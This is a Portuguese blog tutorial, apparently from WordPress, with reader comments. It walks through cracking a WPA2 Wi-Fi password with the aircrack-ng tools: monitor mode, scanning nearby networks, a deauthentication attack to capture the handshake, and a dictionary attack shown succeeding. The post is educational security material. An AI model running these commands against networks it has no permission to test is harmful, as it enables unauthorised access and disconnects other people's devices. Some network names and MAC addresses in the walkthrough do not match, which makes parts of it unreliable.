Compartilhando Conhecimento – Quebra de senha Wi-Fi (WPA2)

Olá pessoal,

Estou aqui novamente para escrever sobre segurança da informação mas, desta vez, irei colocar aqui os testes que venho fazendo e compartilhar minhas pesquisas e estudos.
No post de hoje irei mostrar sobre quebra de senha WPA2.

No início sabia e havia testado que senhas WEP são fáceis de serem quebradas por isso resolvi aprender a arte sobre o WPA2, como de costume serei o mais detalhista possível nas minhas explicações e os comandos não ficaram bons com o copiar do terminal e colar aqui. #FicaaDica.

Disclaimer: Meus testes e minhas ações são feitas em um lugar preparado para isso e a empresa em que eu trabalho não tem nenhum envolvimento com meus testes!

Vamos lá, o que é o bendito WPA2 e o WEP

WEP: Wired Equivalent Privacy – Algoritimo de segurança criado em 1999 e por estar tanto tempo no mercado é o que contem mais vulnerabilidades e é fácil de ser explorado pois tem somente 128bits, sendo assim, sabemos que a senha tem um determinado limite facilitando o ataque de dicionário.

WPA: Wi-Fi Protected Access entrou no lugar do WEP como um algoritimo de segurança mais seguro, teve inicio em 2003 e traz 256bits de encriptação de senha (Agora sim !!!) mas, não foi um protocolo escrito desde o inicio foram utilizados protocolos do nosso antigo WEP (Ai caramba!!), será que os problemas do WEP vieram para o WPA (Putz!!)

WPA2: Wi-Fi Protected Acces II foi implantado pela Wi-Fi Alliance no ano de 2006 a diferença está na inteligencia do algoritimo e a tratativa da senha se blindando de um ataque de força bruta como nos outros mencionado acima, considerado o mais segura hoje. (Tenho que concordar)

Bom depois dessa explicação vamos ao testes, para esse teste eu usei:
– Kali Linux
– airmon-ng
– airodump-ng
– aireplay-ng
– aircrack-ng

Passo 1
Preciso verificar qual a minha interface de rede, para isso digitei o seguinte comando:

root@lpcKali:~# airmon-ng

PHY    Interface    Driver        Chipset

phy0    wlan0        iwlwifi        Intel Corporation Wireless 7260 (rev 93)

#Guardem o nome de sua interface

Passo 2
Precisamos colocar nossa interface em modo monitor, ou seja, no modo em que ela consiga capturar pacotes transmitidos pelo Wi-Fi, para isso digite o seguinte comando:

root@lpcKali:~# airmon-ng start wlan0

PHY    Interface    Driver        Chipset

phy0    wlan0        iwlwifi        Intel Corporation Wireless 7260 (rev 93)

(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

#Ao digitar esse comando ela irá colocar sua interface em modo de monitor e dará um nome para ela, guarde esse nome.

Passo3
Vamos verificar quais os sinais de Wi-Fi estão próximos, digite o seguinte comando:

root@lpcKali:~# airodump-ng wlan0mon

CH  1 ][ Elapsed: 6 s ][ 2016-11-28 22:42

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:25:20:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>
08:95:2A:0B:5C:96  -47       13       26    0   1  54e  WPA2 CCMP   PSK  Leonel_Casa
00:27:29:C9:19:0A  -47       22        0    0   6  54 . WPA2 CCMP   PSK  AAAAAA
6C:B5:6B:9F:87:60  -64       15       13    0  11  54e  WPA2 CCMP   PSK  BBBBBB
28:C8:7A:82:FF:40  -63       13        0    0  11  54e  WPA2 CCMP   PSK  CCCCCC
FC:B0:C4:7B:23:4B  -77        7        0    0   3  54e  WPA2 CCMP   PSK  DDDDDD
40:70:09:1D:C4:50  -81        2        1    0  11  54e  WPA2 CCMP   PSK  EEEEEE
FC:B0:C4:A7:23:4A  -75       13        1    0   3  54e  WPA2 CCMP   PSK  FFFFFF

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

00:25:20:FF:94:73  E6:83:82:D5:BE:06  -79    0 -12    168        8
(not associated)   00:90:A2:42:DA:96  -69    0 – 1     12        6  GGGGGGG
08:95:2A:0B:5C:96  5C:E0:C5:FF:BE:15  -51    0e- 0e     0       26
6C:B5:6B:9F:87:60  38:0F:4A:23:FA:D1   -1    0e- 0      0       13
40:70:09:1D:C4:50  44:00:10:5E:1F:B9   -1    1e- 0      0        1
FC:B0:C4:A7:23:4A  E8:39:DF:55:83:FB   -1    1e- 0      0        1

# Podemos ver que temos muita redes perto de nós, iremos utilizar de exemplo a Leonel_Casa, guarde com você o BSSID e o Channel do Wi-Fi que será a vítima.

Passo 4
Vamos criar um arquivo de captura de informações da rede que queremos atacar, esse arquivo tem o nome de CAP e dentro dele teremos toda troca de informação necessária para captura da senha ou seja, precisamos de um handshake  (Vou explicar isso lá em baixo = Seja curioso e não fique somente digitando sem entender o por que), digite o seguinte comando:

root@lpcKali:~# airodump-ng –bssid 08:95:2A:0B:5C:96 -c 1 -w LeonelCrack wlan0mon
Ou Seja:
Comando – airodump-ng
BSSID – Hexa detectado no passo 3
– c número do canal
– w Nome do arquivo que será criado
Interface de monitoramento

#Feito isso ele irá trazer somente informações da rede que você escolheu e irá gravar tudo em arquivo “LeonelCrack”.

Passo 5
Agora você já tem um pacote com as informações que estão trafegando mas, isso é suficiente? NÃO
Lembra que mencionei sobre o handshake? precisamos fazer com que trafegue esse HS para que possamos capturar a troca da senha, para isso deixe o passo 4 rodando em um terminal, abra outro e digite:

aireplay-ng -a <BSSID: -c <MAC a ser DERRUBADO> -0 50 <interface de Monitoramento>
Ou Seja:
root@lpcKali:~# aireplay-ng -a 08:95:2A:0B:5C:96 -c 40:B8:37:E8:52:52 -0 50 wlan0mon

#Ao executar esse comando, na sua tela onde esta rodando o passo 4 aparecerá uma notificação que você conseguiu abter o handshake conforme tela abaixo:

CH  1 ][ Elapsed: 4 mins ][ 2016-11-28 23:02 ][ WPA handshake: 08:95:2A:0B:5C:96

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

08:95:2A:0B:5C:96  -47 100     2916     2229   14   1  54e  WPA2 CCMP   PSK  ContiHome

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

08:95:2A:0B:5C:96  40:B8:37:E8:52:52    0    1e- 1e   128     6694  ContiHome
08:95:2A:0B:5C:96  5C:E0:C5:FF:AE:15  -49    0e- 0e     0     1708

#Ótimo temos o que precisamos vamos descobrir a senha dessa rede agora?

Passo 6
Agora que temos o arquivo .CAP devido ao dump que você fez precisamos somente de um arquivo de texto com possíveis senhas, atualmente utilizo uma pessoal mas na internet pode achar boas listas de senha, tento essa lista em mãos o comando para iniciar o processo é:

root@lpcKali:~/Documents/Password# aircrack-ng -w Pwd.txt /root/LeonelCrack-01.cap

# Irá iniciar um programa onde fará o teste das senhas do arquivo de texto, SE, dentro do arquivo contiver a senha, DONE, você conseguiu quebrar a senha do Wi-Fi. O resultado é da seguinte forma:

Aircrack-ng 1.2 rc4

[00:00:00] 204/39331 keys tested (1501.86 k/s)

Time left: 26 seconds                                      0.52%

KEY FOUND! [ 12345#78 ]

Master Key     : 4E 29 5B 55 B5 22 43 E9 EE 0E EF 2F 11 E6 4B FA
BB 27 45 0D E2 64 38 54 73 C7 BF 78 81 5D 7B 59

Transient Key  : 0F 2D B7 DF D3 C1 63 2D 2A 35 6C 44 82 2A 74 CC
6E 27 97 24 E5 22 93 0F BA FE AA C6 ED ED F7 C9
17 DF CC D3 C1 CD 17 37 14 2D CE A2 31 C5 41 BA
AF 2C 2B 7E 32 22 0C E4 46 99 56 51 A7 D3 FD 39

EAPOL HMAC     : 49 14 F8 0D A5 9B D0 8E 75 64 8C 85 8B A2 74 8D
root@lpcKali:~/Documents/Password#

Vamos para alguns detalhes.

A senha WPA2 é MUITO difícil de ser quebrada, mas dai você olha para a minha explicação e diz, “Claro que não é fácil”, lhe respondo da seguinte forma:
– Foi fácil por que temos uma senha simples de ser quebrada, utilizamos um txt com possível senhas e a nossa por ser simples estava lá mas, quando colocamos complexidade em nossas senhas como por exemplo “M!nh@S3nh@” posso lhe garantir que a quebra dela será muito difícil – (Acreditem em mim eu mesmo fiquei 2 dias para achar uma senha e não consegui).

Para finalizar deixo pra vocês algumas curiosidades de forma MACRO para que você procurem mais sobre o assunto:

BSSID – Basic Service Set Identifier – O endereço MAC do seu Roteador
ESSID – Extended Service Set Identifier – O nome de sua rede de acesso
HandShake – Aperto de mão?

Espero que tenham gostado, até a próxima.

Advertisements

5 thoughts on “Compartilhando Conhecimento – Quebra de senha Wi-Fi (WPA2)

  1. Ótimo post! Mas me tira uma dúvida por gentileza: É possível realizar este procedimento por uma VM no VMware? Logo no comando ‘airmon-ng’ me deparei com um problema: Não é encontrada nenhuma interface, porém na questão física está tudo ok. Pesquisei em alguns fóruns no entanto nenhum me deu uma resposta cabível.
    Um outro profissional estava com o mesmo problema e segundo ele foi solucionado ao iniciar o Kali Linux por dual boot em vez de uma VM.

    1. Olá Gilberto,
      Primeiramente obrigado por ler meu post,
      Sobre seu problema, eu tenho o KALI rodando eu meu notebook diretamente, não utilizo de VM, irei fazer um teste com um amigo e lhe retorno por e-mail.
      Ademais, deseja ver algum post sobre algo em especifico de segurança?

    2. Gilberto,
      Vamos lá, não sou especialista na solução VMware mas, utilizando um caso de um amigo que fez o teste em um ambiente parecido com o seu “WMware com Kali e rodando windows por baixo”, ele também não conseguiu e a solução foi utilizar uma placa de rede USB pois assim é possível colocar a placa em modo monitor.
      Espero que eu tenha lhe ajudado!

      Leonel

  2. Esclarecido! Muito obrigado pela resposta.
    Sugestão de postagem: Como desenvolver uma carreira voltada para a segurança da informação? Quais certificações e formações são imprescindíveis para este profissional?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s